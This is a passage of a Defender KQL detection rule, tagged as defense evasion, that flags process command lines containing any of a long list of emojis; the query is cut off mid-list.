high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "🦆" or ProcessCommandLine contains "🦅" or ProcessCommandLine contains "🦉" or ProcessCommandLine contains "🦇" or ProcessCommandLine contains "🐺" or ProcessCommandLine contains "🐗" or ProcessCommandLine contains "🐴" or ProcessCommandLine contains "🦄" or ProcessCommandLine contains "🐝" or ProcessCommandLine contains "🪱" or ProcessCommandLine contains "🐛" or ProcessCommandLine contains "🦋" or ProcessCommandLine contains "🐌" or ProcessCommandLine contains "🐞" or ProcessCommandLine contains "🐜" or ProcessCommandLine contains "🪰" or ProcessCommandLine contains "🪲" or ProcessCommandLine contains "🪳" or ProcessCommandLine contains "🦟" or ProcessCommandLine contains "🦗" or ProcessCommandLine contains "🕷" or ProcessCommandLine contains "🕸" or ProcessCommandLine contains "🦂" or ProcessCommandLine contains "🐢" or ProcessCommandLine contains "🐍" or ProcessCommandLine contains "🦎" or ProcessCommandLine contains "🦖" or ProcessCommandLine contains "🦕" or ProcessCommandLine contains "🐙" or ProcessCommandLine contains "🦑" or ProcessCommandLine contains "🦐" or ProcessCommandLine contains "🦞" or ProcessCommandLine contains "🦀" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🐡" or ProcessCommandLine contains "🐠" or ProcessCommandLine contains "🐟" or ProcessCommandLine contains "🐬" or ProcessCommandLine contains "🐳" or ProcessCommandLine contains "🐋" or ProcessCommandLine contains "🦈" or ProcessCommandLine contains "🐊" or ProcessCommandLine contains "🐅" or ProcessCommandLine contains "🐆" or ProcessCommandLine contains "🦓" or ProcessCommandLine contains "🦍" or ProcessCommandLine contains "🦧" or ProcessCommandLine contains "🦣" or ProcessCommandLine contains "🐘" or ProcessCommandLine contains "🦛" or ProcessCommandLine contains "🦏" or ProcessCommandLine contains "🐪" or ProcessCommandLine contains "🐫" or ProcessCommandLine contains "🦒" or ProcessCommandLine contains "🦘" or ProcessCommandLine contains "🦬" or ProcessCommandLine contains "🐃" or ProcessCommandLine contains "🐂" or ProcessCommandLine contains "🐄" or ProcessCommandLine contains "🐎" or ProcessCommandLine contains "🐖" or ProcessCommandLine contains "🐏" or ProcessCommandLine contains "🐑" or ProcessCommandLine contains "🦙" or ProcessCommandLine contains "🐐" or ProcessCommandLine contains "🦌" or ProcessCommandLine contains "🐕" or ProcessCommandLine contains "🐩" or ProcessCommandLine contains "🦮" or ProcessCommandLine contains "🐕‍🦺" or ProcessCommandLine contains "🐈" or ProcessCommandLine contains "🐈‍⬛" or ProcessCommandLine contains "🪶" or ProcessCommandLine contains "🐓" or ProcessCommandLine contains "🦃" or ProcessCommandLine contains "🦤" or ProcessCommandLine contains "🦚" or ProcessCommandLine contains "🦜" or ProcessCommandLine contains "🦢" or ProcessCommandLine contains "🦩" or ProcessCommandLine contains "🕊" or ProcessCommandLine contains "🐇" or ProcessCommandLine contains "🦝" or ProcessCommandLine contains "🦨" or ProcessCommandLine contains "🦡" or ProcessCommandLine contains "🦫" or ProcessCommandLine contains "🦦" or ProcessCommandLine contains "🦥" or ProcessCommandLine contains "🐁" or ProcessCommandLine contains "🐀" or ProcessCommandLine contains "🐿" or ProcessCommandLine contains "🦔" or ProcessCommandLine contains "🐾" or ProcessCommandLine contains "🐉" or ProcessCommandLine contains "🐲" or ProcessCommandLine contains "🌵" or ProcessCommandLine contains "🎄" or ProcessCommandLine contains "🌲" or ProcessCommandLine contains "🌳" or ProcessCommandLine contains "🌴" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🪵" or ProcessCommandLine contains "🌱" or ProcessCommandLine contains "🌿" or ProcessCommandLine contains "☘️" or ProcessCommandLine contains "🍀" or ProcessCommandLine contains "🎍" or ProcessCommandLine contains "🪴" or ProcessCommandLine contains "🎋" or ProcessCommandLine contains "🍃" or ProcessCommandLine contains "🍂" or ProcessCommandLine contains "🍁" or ProcessCommandLine contains "🍄" or ProcessCommandLine contains "🐚" or ProcessCommandLine contains "🪨" or ProcessCommandLine contains "🌾" or ProcessCommandLine contains "💐" or ProcessCommandLine contains "🌷" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🌹" or ProcessCommandLine contains "🥀" or ProcessCommandLine contains "🌺" or ProcessCommandLine contains "🌸" or ProcessCommandLine contains "🌼" or ProcessCommandLine contains "🌻" or ProcessCommandLine contains "🌞" or ProcessCommandLine contains "🌝" or ProcessCommandLine contains "🌛" or ProcessCommandLine contains "🌜" or ProcessCommandLine contains "🌚" or ProcessCommandLine contains "🌕" or ProcessCommandLine contains "🌖" or ProcessCommandLine contains "🌗" or ProcessCommandLine contains "🌘" or ProcessCommandLine contains "🌑" or ProcessCommandLine contains "🌒" or ProcessCommandLine contains "🌓" or ProcessCommandLine contains "🌔" or ProcessCommandLine contains "🌙" or ProcessCommandLine contains "🌎" or ProcessCommandLine contains "🌍" or ProcessCommandLine contains "🌏" or ProcessCommandLine contains "🪐" or ProcessCommandLine contains "💫" or ProcessCommandLine contains "⭐️" or ProcessCommandLine contains "🌟" or ProcessCommandLine contains "✨" or ProcessCommandLine contains "⚡️" or ProcessCommandLine contains "☄️" or ProcessCommandLine contains "💥" or ProcessCommandLine contains "🔥" or ProcessCommandLine contains "🌪" or ProcessCommandLine contains "🌈" or ProcessCommandLine contains "☀️" or ProcessCommandLine contains "🌤" or ProcessCommandLine contains "⛅️" or ProcessCommandLine contains "🌥" or ProcessCommandLine contains "☁️" or ProcessCommandLine contains "🌦" or ProcessCommandLine contains "🌧" or ProcessCommandLine contains "⛈" or ProcessCommandLine contains "🌩" or ProcessCommandLine contains "🌨" or ProcessCommandLine contains "❄️" or ProcessCommandLine contains "☃️" or ProcessCommandLine contains "⛄️" or ProcessCommandLine contains "🌬" or ProcessCommandLine contains "💨" or ProcessCommandLine contains "💧" or ProcessCommandLine contains "💦" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "☔️" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🌊" or ProcessCommandLine contains "🌫🍏" or ProcessCommandLine contains "🍎" or ProcessCommandLine contains "🍐" or ProcessCommandLine contains "🍊" or ProcessCommandLine contains "🍋" or ProcessCommandLine contains "🍌" or ProcessCommandLine contains "🍉" or ProcessCommandLine contains "🍇" or ProcessCommandLine contains "🍓" or ProcessCommandLine contains "🫐" or ProcessCommandLine contains "🍈" or ProcessCommandLine contains "🍒" or ProcessCommandLine contains "🍑" or ProcessCommandLine contains "🥭" or ProcessCommandLine contains "🍍" or ProcessCommandLine contains "🥥" or ProcessCommandLine contains "🥝" or ProcessCommandLine contains "🍅" or ProcessCommandLine contains "🍆" or ProcessCommandLine contains "🥑" or ProcessCommandLine contains "🥦" or ProcessCommandLine contains "🥬" or ProcessCommandLine contains "🥒" or ProcessCommandLine contains "🌶" or ProcessCommandLine contains "🫑" or ProcessCommandLine contains "🌽" or ProcessCommandLine contains "🥕" or ProcessCommandLine contains "🫒" or ProcessCommandLine contains "🧄" or ProcessCommandLine contains "🧅" or ProcessCommandLine contains "🥔" or ProcessCommandLine contains "🍠" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🥐" or ProcessCommandLine contains "🥯" or ProcessCommandLine contains "🍞" or ProcessCommandLine contains "🥖" or ProcessCommandLine contains "🥨" or ProcessCommandLine contains "🧀" or ProcessCommandLine contains "🥚" or ProcessCommandLine contains "🍳" or ProcessCommandLine contains "🧈" or ProcessCommandLine contains "🥞" or ProcessCommandLine contains "🧇" or ProcessCommandLine contains "🥓" or ProcessCommandLine contains "🥩" or ProcessCommandLine contains "🍗" or ProcessCommandLine contains "🍖" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "🌭" or ProcessCommandLine contains "🍔" or ProcessCommandLine contains "🍟" or ProcessCommandLine contains "🍕" or ProcessCommandLine contains "🫓" or ProcessCommandLine contains "🥪" or ProcessCommandLine contains "🥙" or ProcessCommandLine contains "🧆" or ProcessCommandLine contains "🌮" or ProcessCommandLine contains "🌯" or ProcessCommandLine contains "🫔" or ProcessCommandLine contains "🥗" or ProcessCommandLine contains "🥘" or ProcessCommandLine contains "🫕" or ProcessCommandLine contains "🥫" or ProcessCommandLine contains "🍝" or ProcessCommandLine contains "🍜" or ProcessCommandLine contains "🍲" or ProcessCommandLine contains "🍛" or ProcessCommandLine contains "🍣" or ProcessCommandLine contains "🍱" or ProcessCommandLine contains "🥟" or ProcessCommandLine contains "🦪" or ProcessCommandLine contains "🍤" or ProcessCommandLine contains "🍙" or ProcessCommandLine contains "🍚" or ProcessCommandLine contains "🍘" or ProcessCommandLine contains "🍥" or ProcessCommandLine contains "🥠" or ProcessCommandLine contains "🥮" or ProcessCommandLine contains "🍢" or ProcessCommandLine contains "🍡" or ProcessCommandLine contains "🍧" or ProcessCommandLine contains "🍨" or ProcessCommandLine contains "🍦" or ProcessCommandLine contains "🥧" or ProcessCommandLine contains "🧁" or ProcessCommandLine contains "🍰" or ProcessCommandLine contains "🎂" or ProcessCommandLine contains "🍮" or ProcessCommandLine contains "🍭" or ProcessCommandLine contains "🍬" or ProcessCommandLine contains "🍫" or ProcessCommandLine contains "🍿" or ProcessCommandLine contains "🍩" or ProcessCommandLine contains "🍪" or ProcessCommandLine contains "🌰" or ProcessCommandLine contains "🥜" or ProcessCommandLine contains "🍯" or ProcessCommandLine contains "🥛" or ProcessCommandLine contains "🍼" or ProcessCommandLine contains "🫖" or ProcessCommandLine contains "☕️" or ProcessCommandLine contains "🍵" or ProcessCommandLine contains "🧃" or ProcessCommandLine contains "🥤" or ProcessCommandLine contains "🧋" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🍶" or ProcessCommandLine contains "🍺" or ProcessCommandLine contains "🍻" or ProcessCommandLine contains "🥂" or ProcessCommandLine contains "🍷" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🥃" or ProcessCommandLine contains "🍸" or ProcessCommandLine contains "🍹" or ProcessCommandLine contains "🧉" or ProcessCommandLine contains "🍾" or ProcessCommandLine contains "🧊" or ProcessCommandLine contains "🥄" or ProcessCommandLine contains "🍴" or ProcessCommandLine contains "🍽" or ProcessCommandLine contains "🥣" or ProcessCommandLine contains "🥡" or ProcessCommandLine contains "🥢" or ProcessCommandLine contains "🧂" or ProcessCommandLine contains "⚽️" or ProcessCommandLine contains "🏀" or ProcessCommandLine contains "🏈" or ProcessCommandLine contains "⚾️" or ProcessCommandLine contains "🥎" or ProcessCommandLine contains "🎾" or ProcessCommandLine contains "🏐" or ProcessCommandLine contains "🏉" or ProcessCommandLine contains "🥏" or ProcessCommandLine contains "🎱" or ProcessCommandLine contains "🪀" or ProcessCommandLine contains "🏓" or ProcessCommandLine contains "🏸" or ProcessCommandLine contains "🏒" or ProcessCommandLine contains "🏑" or ProcessCommandLine contains "🥍" or ProcessCommandLine contains "🏏" or ProcessCommandLine contains "🪃" or ProcessCommandLine contains "🥅" or ProcessCommandLine contains "⛳️" or ProcessCommandLine contains "🪁" or ProcessCommandLine contains "🏹" or ProcessCommandLine contains "🎣" or ProcessCommandLine contains "🤿" or ProcessCommandLine contains "🥊" or ProcessCommandLine contains "🥋" or ProcessCommandLine contains "🎽" or ProcessCommandLine contains "🛹" or ProcessCommandLine contains "🛼" or ProcessCommandLine contains "🛷" or ProcessCommandLine contains "⛸" or ProcessCommandLine contains "🥌" or ProcessCommandLine contains "🎿" or ProcessCommandLine contains "⛷" or ProcessCommandLine contains "🏂" or ProcessCommandLine contains "🪂" or ProcessCommandLine contains "🏋️‍♀️" or ProcessCommandLine contains "🏋️" or ProcessCommandLine contains "🏋️‍♂️" or ProcessCommandLine contains "🤼‍♀️" or ProcessCommandLine contains "🤼" or ProcessCommandLine contains "🤼‍♂️" or ProcessCommandLine contains "🤸‍♀️" or ProcessCommandLine contains "🤸" or ProcessCommandLine contains "🤸‍♂️" or ProcessCommandLine contains "⛹️‍♀️" or ProcessCommandLine contains "⛹️" or ProcessCommandLine contains "⛹️‍♂️" or ProcessCommandLine contains "🤺" or ProcessCommandLine contains "🤾‍♀️" or ProcessCommandLine contains "🤾" or ProcessCommandLine contains "🤾‍♂️" or ProcessCommandLine contains "🏌️‍♀️" or ProcessCommandLine contains "🏌️" or ProcessCommandLine contains "🏌️‍♂️" or ProcessCommandLine contains "🏇" or ProcessCommandLine contains "🧘‍♀️" or ProcessCommandLine contains "🧘" or ProcessCommandLine contains "🧘‍♂️" or ProcessCommandLine contains "🏄‍♀️" or ProcessCommandLine contains "🏄" or ProcessCommandLine contains "🏄‍♂️" or ProcessCommandLine contains "🏊‍♀️" or ProcessCommandLine contains "🏊" or ProcessCommandLine contains "🏊‍♂️" or ProcessCommandLine contains "🤽‍♀️" or ProcessCommandLine contains "🤽" or ProcessCommandLine contains "🤽‍♂️" or ProcessCommandLine contains "🚣‍♀️" or ProcessCommandLine contains "🚣" or ProcessCommandLine contains "🚣‍♂️" or ProcessCommandLine contains "🧗‍♀️" or ProcessCommandLine contains "🧗" or ProcessCommandLine contains "🧗‍♂️" or ProcessCommandLine contains "🚵‍♀️" or ProcessCommandLine contains "🚵" or ProcessCommandLine contains "🚵‍♂️" or ProcessCommandLine contains "🚴‍♀️" or ProcessCommandLine contains "🚴" or ProcessCommandLine contains "🚴‍♂️" or ProcessCommandLine contains "🏆" or ProcessCommandLine contains "🥇" or ProcessCommandLine contains "🥈" or ProcessCommandLine contains "🥉" or ProcessCommandLine contains "🏅" or ProcessCommandLine contains "🎖" or ProcessCommandLine contains "🏵" or ProcessCommandLine contains "🎗" or ProcessCommandLine contains "🎫" or ProcessCommandLine contains "🎟" or ProcessCommandLine contains "🎪" or ProcessCommandLine contains "🤹" or ProcessCommandLine contains "🤹‍♂️" or ProcessCommandLine contains "🤹‍♀️" or ProcessCommandLine contains "🎭" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "🎨" or ProcessCommandLine contains "🎬" or ProcessCommandLine contains "🎤" or ProcessCommandLine contains "🎧" or ProcessCommandLine contains "🎼" or ProcessCommandLine contains "🎹" or ProcessCommandLine contains "🥁" or ProcessCommandLine contains "🪘" or ProcessCommandLine contains "🎷" or ProcessCommandLine contains "🎺" or ProcessCommandLine contains "🪗" or ProcessCommandLine contains "🎸" or ProcessCommandLine contains "🪕" or ProcessCommandLine contains "🎻" or ProcessCommandLine contains "🎲" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "🎯" or ProcessCommandLine contains "🎳" or ProcessCommandLine contains "🎮" or ProcessCommandLine contains "🎰" or ProcessCommandLine contains "🧩" or ProcessCommandLine contains "🚗" or ProcessCommandLine contains "🚕" or ProcessCommandLine contains "🚙" or ProcessCommandLine contains "🚌" or ProcessCommandLine contains "🚎" or ProcessCommandLine contains "🏎" or ProcessCommandLine contains "🚓" or ProcessCommandLine contains "🚑" or ProcessCommandLine contains "🚒" or ProcessCommandLine contains "🚐" or ProcessCommandLine contains "🛻" or ProcessCommandLine contains "🚚" or ProcessCommandLine contains "🚛" or ProcessCommandLine contains "🚜" or ProcessCommandLine contains "🦯" or ProcessCommandLine contains "🦽" or ProcessCommandLine contains "🦼" or ProcessCommandLine contains "🛴" or ProcessCommandLine contains "🚲" or ProcessCommandLine contains "🛵" or ProcessCommandLine contains "🏍" or ProcessCommandLine contains "🛺" or ProcessCommandLine contains "🚨" or ProcessCommandLine contains "🚔" or ProcessCommandLine contains "🚍" or ProcessCommandLine contains "🚘" or ProcessCommandLine contains "🚖" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🚡" or ProcessCommandLine contains "🚠" or ProcessCommandLine contains "🚟" or ProcessCommandLine contains "🚃" or ProcessCommandLine contains "🚋" or ProcessCommandLine contains "🚞" or ProcessCommandLine contains "🚝" or ProcessCommandLine contains "🚄" or ProcessCommandLine contains "🚅" or ProcessCommandLine contains "🚈" or ProcessCommandLine contains "🚂" or ProcessCommandLine contains "🚆" or ProcessCommandLine contains "🚇" or ProcessCommandLine contains "🚊" or ProcessCommandLine contains "🚉" or ProcessCommandLine contains "✈️" or ProcessCommandLine contains "🛫" or ProcessCommandLine contains "🛬" or ProcessCommandLine contains "🛩" or ProcessCommandLine contains "💺" or ProcessCommandLine contains "🛰" or ProcessCommandLine contains "🚀" or ProcessCommandLine contains "🛸" or ProcessCommandLine contains "🚁" or ProcessCommandLine contains "🛶" or ProcessCommandLine contains "⛵️" or ProcessCommandLine contains "🚤" or ProcessCommandLine contains "🛥" or ProcessCommandLine contains "🛳" or ProcessCommandLine contains "⛴" or ProcessCommandLine contains "🚢" or ProcessCommandLine contains "⚓️" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪝" or ProcessCommandLine contains "⛽️" or ProcessCommandLine contains "🚧" or ProcessCommandLine contains "🚦" or ProcessCommandLine contains "🚥" or ProcessCommandLine contains "🚏" or ProcessCommandLine contains "🗺" or ProcessCommandLine contains "🗿" or ProcessCommandLine contains "🗽" or ProcessCommandLine contains "🗼" or ProcessCommandLine contains "🏰" or ProcessCommandLine contains "🏯" or ProcessCommandLine contains "🏟" or ProcessCommandLine contains "🎡" or ProcessCommandLine contains "🎢" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🎠" or ProcessCommandLine contains "⛲️" or ProcessCommandLine contains "⛱" or ProcessCommandLine contains "🏖" or ProcessCommandLine contains "🏝" or ProcessCommandLine contains "🏜" or ProcessCommandLine contains "🌋" or ProcessCommandLine contains "⛰" or ProcessCommandLine contains "🏔" or ProcessCommandLine contains "🗻" or ProcessCommandLine contains "🏕" or ProcessCommandLine contains "⛺️" or ProcessCommandLine contains "🛖" or ProcessCommandLine contains "🏠" or ProcessCommandLine contains "🏡" or ProcessCommandLine contains "🏘" or ProcessCommandLine contains "🏚" or ProcessCommandLine contains "🏗" or ProcessCommandLine contains "🏭" or ProcessCommandLine contains "🏢" or ProcessCommandLine contains "🏬" or ProcessCommandLine contains "🏣" or ProcessCommandLine contains "🏤" or ProcessCommandLine contains "🏥" or ProcessCommandLine contains "🏦" or ProcessCommandLine contains "🏨" or ProcessCommandLine contains "🏪" or ProcessCommandLine contains "🏫" or ProcessCommandLine contains "🏩" or ProcessCommandLine contains "💒" or ProcessCommandLine contains "🏛" or ProcessCommandLine contains "⛪️" or ProcessCommandLine contains "🕌" or ProcessCommandLine contains "🕍" or ProcessCommandLine contains "🛕" or ProcessCommandLine contains "🕋" or ProcessCommandLine contains "⛩" or ProcessCommandLine contains "🛤" or ProcessCommandLine contains "🛣" or ProcessCommandLine contains "🗾" or ProcessCommandLine contains "🎑" or ProcessCommandLine contains "🏞" or ProcessCommandLine contains "🌅" or ProcessCommandLine contains "🌄" or ProcessCommandLine contains "🌠" or ProcessCommandLine contains "🎇" or ProcessCommandLine contains "🎆" or ProcessCommandLine contains "🌇" or ProcessCommandLine contains "🌆" or ProcessCommandLine contains "🏙" or ProcessCommandLine contains "🌃" or ProcessCommandLine contains "🌌" or ProcessCommandLine contains "🌉" or ProcessCommandLine contains "🌁" or ProcessCommandLine contains "⌚️" or ProcessCommandLine contains "📱" or ProcessCommandLine contains "📲" or ProcessCommandLine contains "💻" or ProcessCommandLine contains "⌨️" or ProcessCommandLine contains "🖥" or ProcessCommandLine contains "🖨" or ProcessCommandLine contains "🖱" or ProcessCommandLine contains "🖲" or ProcessCommandLine contains "🕹" or ProcessCommandLine contains "🗜" or ProcessCommandLine contains "💽" or ProcessCommandLine contains "💾" or ProcessCommandLine contains "💿" or ProcessCommandLine contains "📀" or ProcessCommandLine contains "📼" or ProcessCommandLine contains "📷" or ProcessCommandLine contains "📸" or ProcessCommandLine contains "📹" or ProcessCommandLine contains "🎥" or ProcessCommandLine contains "📽" or ProcessCommandLine contains "🎞" or ProcessCommandLine contains "📞" or ProcessCommandLine contains "☎️" or ProcessCommandLine contains "📟" or ProcessCommandLine contains "📠" or ProcessCommandLine contains "📺" or ProcessCommandLine contains "📻" or ProcessCommandLine contains "🎙" or ProcessCommandLine contains "🎚" or ProcessCommandLine contains "🎛" or ProcessCommandLine contains "🧭" or ProcessCommandLine contains "⏱" or ProcessCommandLine contains "⏲" or ProcessCommandLine contains "⏰" or ProcessCommandLine contains "🕰" or ProcessCommandLine contains "⌛️" or ProcessCommandLine contains "⏳" or ProcessCommandLine contains "📡" or ProcessCommandLine contains "🔋" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🔌" or ProcessCommandLine contains "💡" or ProcessCommandLine contains "🔦" or ProcessCommandLine contains "🕯" or ProcessCommandLine contains "🪔" or ProcessCommandLine contains "🧯" or ProcessCommandLine contains "🛢" or ProcessCommandLine contains "💸" or ProcessCommandLine contains "💵" or ProcessCommandLine contains "💴" or ProcessCommandLine contains "💶" or ProcessCommandLine contains "💷" or ProcessCommandLine contains "🪙" or ProcessCommandLine contains "💰" or ProcessCommandLine contains "💳" or ProcessCommandLine contains "💎" or ProcessCommandLine contains "⚖️" or ProcessCommandLine contains "🪜" or ProcessCommandLine contains "🧰" or ProcessCommandLine contains "🪛" or ProcessCommandLine contains "🔧" or ProcessCommandLine contains "🔨" or ProcessCommandLine contains "⚒" or ProcessCommandLine contains "🛠" or ProcessCommandLine contains "⛏" or ProcessCommandLine contains "🪚" or ProcessCommandLine contains "🔩" or ProcessCommandLine contains "⚙️" or ProcessCommandLine contains "🪤" or ProcessCommandLine contains "🧱" or ProcessCommandLine contains "⛓" or ProcessCommandLine contains "🧲" or ProcessCommandLine contains "🔫" or ProcessCommandLine contains "💣" or ProcessCommandLine contains "🧨" or ProcessCommandLine contains "🪓" or ProcessCommandLine contains "🔪" or ProcessCommandLine contains "🗡" or ProcessCommandLine contains "⚔️" or ProcessCommandLine contains "🛡" or ProcessCommandLine contains "🚬" or ProcessCommandLine contains "⚰️" or ProcessCommandLine contains "🪦" or ProcessCommandLine contains "⚱️" or ProcessCommandLine contains "🏺" or ProcessCommandLine contains "🔮" or ProcessCommandLine contains "📿" or ProcessCommandLine contains "🧿" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "💈" or ProcessCommandLine contains "⚗️" or ProcessCommandLine contains "🔭" or ProcessCommandLine contains "🔬" or ProcessCommandLine contains "🕳" or ProcessCommandLine contains "🩹" or ProcessCommandLine contains "🩺" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "💊" or ProcessCommandLine contains "💉" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "🧬" or ProcessCommandLine contains "🦠" or ProcessCommandLine contains "🧫" or ProcessCommandLine contains "🧪" or ProcessCommandLine contains "🌡" or ProcessCommandLine contains "🧹" or ProcessCommandLine contains "🪠" or ProcessCommandLine contains "🧺" or ProcessCommandLine contains "🧻" or ProcessCommandLine contains "🚽" or ProcessCommandLine contains "🚰" or ProcessCommandLine contains "🚿" or ProcessCommandLine contains "🛁" or ProcessCommandLine contains "🛀" or ProcessCommandLine contains "🧼" or ProcessCommandLine contains "🪥" or ProcessCommandLine contains "🪒" or ProcessCommandLine contains "🧽" or ProcessCommandLine contains "🪣" or ProcessCommandLine contains "🧴" or ProcessCommandLine contains "🛎" or ProcessCommandLine contains "🔑" or ProcessCommandLine contains "🗝" or ProcessCommandLine contains "🚪" or ProcessCommandLine contains "🪑" or ProcessCommandLine contains "🛋" or ProcessCommandLine contains "🛏" or ProcessCommandLine contains "🛌" or ProcessCommandLine contains "🧸" or ProcessCommandLine contains "🪆" or ProcessCommandLine contains "🖼" or ProcessCommandLine contains "🪞" or ProcessCommandLine contains "🪟" or ProcessCommandLine contains "🛍" or ProcessCommandLine contains "🛒" or ProcessCommandLine contains "🎁" or ProcessCommandLine contains "🎈" or ProcessCommandLine contains "🎏" or ProcessCommandLine contains "🎀" or ProcessCommandLine contains "🪄" or ProcessCommandLine contains "🪅" or ProcessCommandLine contains "🎊" or ProcessCommandLine contains "🎉" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🎎" or ProcessCommandLine contains "🏮" or ProcessCommandLine contains "🎐" or ProcessCommandLine contains "🧧" or ProcessCommandLine contains "✉️" or ProcessCommandLine contains "📩" or ProcessCommandLine contains "📨" or ProcessCommandLine contains "📧" or ProcessCommandLine contains "💌" or ProcessCommandLine contains "📥" or ProcessCommandLine contains "📤" or ProcessCommandLine contains "📦" or ProcessCommandLine contains "🏷" or ProcessCommandLine contains "🪧" or ProcessCommandLine contains "📪" or ProcessCommandLine contains "📫" or ProcessCommandLine contains "📬" or ProcessCommandLine contains "📭" or ProcessCommandLine contains "📮" or ProcessCommandLine contains "📯" or ProcessCommandLine contains "📜" or ProcessCommandLine contains "📃" or ProcessCommandLine contains "📄" or ProcessCommandLine contains "📑" or ProcessCommandLine contains "🧾" or ProcessCommandLine contains "📊" or ProcessCommandLine contains "📈" or ProcessCommandLine contains "📉" or ProcessCommandLine contains "🗒" or ProcessCommandLine contains "🗓" or ProcessCommandLine contains "📆" or ProcessCommandLine contains "📅" or ProcessCommandLine contains "🗑" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "📇" or ProcessCommandLine contains "🗃" or ProcessCommandLine contains "🗳" or ProcessCommandLine contains "🗄" or ProcessCommandLine contains "📋" or ProcessCommandLine contains "📁" or ProcessCommandLine contains "📂" or ProcessCommandLine contains "🗂" or ProcessCommandLine contains "🗞" or ProcessCommandLine contains "📰" or ProcessCommandLine contains "📓" or ProcessCommandLine contains "📔" or ProcessCommandLine contains "📒" or ProcessCommandLine contains "📕" or ProcessCommandLine contains "📗" or ProcessCommandLine contains "📘" or ProcessCommandLine contains "📙" or ProcessCommandLine contains "📚" or ProcessCommandLine contains "📖" or ProcessCommandLine contains "🔖" or ProcessCommandLine contains "🧷" or ProcessCommandLine contains "🔗" or ProcessCommandLine contains "📎" or ProcessCommandLine contains "🖇" or ProcessCommandLine contains "📐" or ProcessCommandLine contains "📏" or ProcessCommandLine contains "🧮" or ProcessCommandLine contains "📌" or ProcessCommandLine contains "📍" or ProcessCommandLine contains "✂️" or ProcessCommandLine contains "🖊" or ProcessCommandLine contains "🖋" or ProcessCommandLine contains "✒️" or ProcessCommandLine contains "🖌" or ProcessCommandLine contains "🖍" or ProcessCommandLine contains "📝" or ProcessCommandLine contains "✏️" or ProcessCommandLine contains "🔍" or ProcessCommandLine contains "🔎" or ProcessCommandLine contains "🔏" or ProcessCommandLine contains "🔐" or ProcessCommandLine contains "🔒" or ProcessCommandLine contains "🔓❤️" or ProcessCommandLine contains "🧡" or ProcessCommandLine contains "💛" or ProcessCommandLine contains "💚" or ProcessCommandLine contains "💙" or ProcessCommandLine contains "💜" or ProcessCommandLine contains "🖤" or ProcessCommandLine contains "🤍" or ProcessCommandLine contains "🤎" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "💔" or ProcessCommandLine contains "❣️" or ProcessCommandLine contains "💕" or ProcessCommandLine contains "💞" or ProcessCommandLine contains "💓" or ProcessCommandLine contains "💗" or ProcessCommandLine contains "💖" or ProcessCommandLine contains "💘" or ProcessCommandLine contains "💝" or ProcessCommandLine contains "💟" or ProcessCommandLine contains "☮️" or ProcessCommandLine contains "✝️" or ProcessCommandLine contains "☪️" or ProcessCommandLine contains "🕉" or ProcessCommandLine contains "☸️" or ProcessCommandLine contains "✡️" or ProcessCommandLine contains "🔯" or ProcessCommandLine contains "🕎" or ProcessCommandLine contains "☯️" or ProcessCommandLine contains "☦️" or ProcessCommandLine contains "🛐" or ProcessCommandLine contains "⛎" or ProcessCommandLine contains "♈️" or ProcessCommandLine contains "♉️" or ProcessCommandLine contains "♊️" or ProcessCommandLine contains "♋️" or ProcessCommandLine contains "♌️" or ProcessCommandLine contains "♍️" or ProcessCommandLine contains "♎️" or ProcessCommandLine contains "♏️" or ProcessCommandLine contains "♐️" or ProcessCommandLine contains "♑️" or ProcessCommandLine contains "♒️" or ProcessCommandLine contains "♓️" or ProcessCommandLine contains "🆔" or ProcessCommandLine contains "⚛️" or ProcessCommandLine contains "🉑" or ProcessCommandLine contains "☢️" or ProcessCommandLine contains "☣️" or ProcessCommandLine contains "📴" or ProcessCommandLine contains "📳" or ProcessCommandLine contains "🈶" or ProcessCommandLine contains "🈚️" or ProcessCommandLine contains "🈸" or ProcessCommandLine contains "🈺" or ProcessCommandLine contains "🈷️" or ProcessCommandLine contains "✴️" or ProcessCommandLine contains "🆚" or ProcessCommandLine contains "💮" or ProcessCommandLine contains "🉐" or ProcessCommandLine contains "㊙️" or ProcessCommandLine contains "㊗️" or ProcessCommandLine contains "🈴" or ProcessCommandLine contains "🈵" or ProcessCommandLine contains "🈹" or ProcessCommandLine contains "🈲" or ProcessCommandLine contains "🅰️" or ProcessCommandLine contains "🅱️" or ProcessCommandLine contains "🆎" or ProcessCommandLine contains "🆑" or ProcessCommandLine contains "🅾️" or ProcessCommandLine contains "🆘" or ProcessCommandLine contains "❌" or ProcessCommandLine contains "⭕️" or ProcessCommandLine contains "🛑" or ProcessCommandLine contains "⛔️" or ProcessCommandLine contains "📛" or ProcessCommandLine contains "🚫" or ProcessCommandLine contains "💯" or ProcessCommandLine contains "💢" or ProcessCommandLine contains "♨️" or ProcessCommandLine contains "🚷" or ProcessCommandLine contains "🚯" or ProcessCommandLine contains "🚳" or ProcessCommandLine contains "🚱" or ProcessCommandLine contains "🔞" or ProcessCommandLine contains "📵" or ProcessCommandLine contains "🚭" or ProcessCommandLine contains "❗️" or ProcessCommandLine contains "❕" or ProcessCommandLine contains "❓" or ProcessCommandLine contains "❔" or ProcessCommandLine contains "‼️" or ProcessCommandLine contains "⁉️" or ProcessCommandLine contains "🔅" or ProcessCommandLine contains "🔆" or ProcessCommandLine contains "〽️" or ProcessCommandLine contains "⚠️" or ProcessCommandLine contains 